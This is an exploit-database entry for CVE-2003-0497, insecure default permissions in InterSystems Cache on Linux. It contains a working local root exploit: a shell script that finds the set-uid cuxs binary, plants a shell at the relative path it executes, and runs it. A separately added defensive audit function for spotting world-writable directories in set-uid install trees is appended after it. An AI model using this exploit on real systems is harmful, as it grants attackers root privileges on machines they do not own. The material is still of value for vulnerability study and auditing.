
InterSystems Cache 4.1.15/5.0.x - Insecure Default Permissions

Author: Larry W. Cashdollar
type: local
platform: linux
port:
date_added: 2003-07-01
date_updated: 2012-11-20
verified: 1
codes: CVE-2003-0497;OSVDB-2229
tags:
aliases:
screenshot_url:
application_url:

source: https://www.securityfocus.com/bid/8070/info

It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges.

#!/bin/sh
# kokaninATdtors playing with 5.0.2.607.1_linux_su.tar (cache) on leenooks.
# this started as an exploit for scenario1 in
# http://www.idefense.com/advisory/07.01.03.txt, but ended up as something else
# A snippetisnip from an strace of the cuxs binary shows:
# execve("../bin/cache", ["cache"], [/* 19 vars */])
# -------^^^^^^^^^^^^^^------- which is stupid stupid stupid since cuxs is +s

TARGET=`find / -type f -name cuxs -perm -4000 2>/dev/null`
mkdir -p crapche/bin
cd crapche/bin
cp `which ash` cache
$TARGET
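The advisory describes an install tree whose directories are world-writable next to a set-uid binary, and the strace line above shows that binary executing a relative path. As an added audit example (not part of the advisory or of the exploit), this POSIX shell function reports set-uid binaries that have a world-writable directory anywhere in their install tree, so an administrator can remove world-write from those directories; the root path and the layout (binary under an install root's bin/ directory) are assumptions.

```shell
#!/bin/sh
# Added audit example; not code from the advisory or the exploit above.

# audit_setuid_tree ROOT
# For every set-uid file below ROOT, take its install tree to be the parent of
# the directory holding it (assumed layout: <install>/bin/<binary>) and print one
# "<setuid binary><TAB><world-writable dir>" line per world-writable directory
# found in that tree. Remediation for each finding is `chmod o-w` on the
# reported directory; the list is only reported, never changed here.
audit_setuid_tree() {
    root=$1
    find "$root" -type f -perm -4000 2>/dev/null | while read -r bin; do
        tree=$(dirname "$(dirname "$bin")")
        find "$tree" -type d -perm -0002 2>/dev/null | while read -r dir; do
            printf '%s\t%s\n' "$bin" "$dir"
        done
    done
}

# count_findings ROOT: number of (set-uid binary, world-writable dir) pairs.
count_findings() {
    audit_setuid_tree "$1" | wc -l | tr -d ' '
}
```

Run as `audit_setuid_tree /opt/cache` (path assumed) and review each reported directory before tightening its mode.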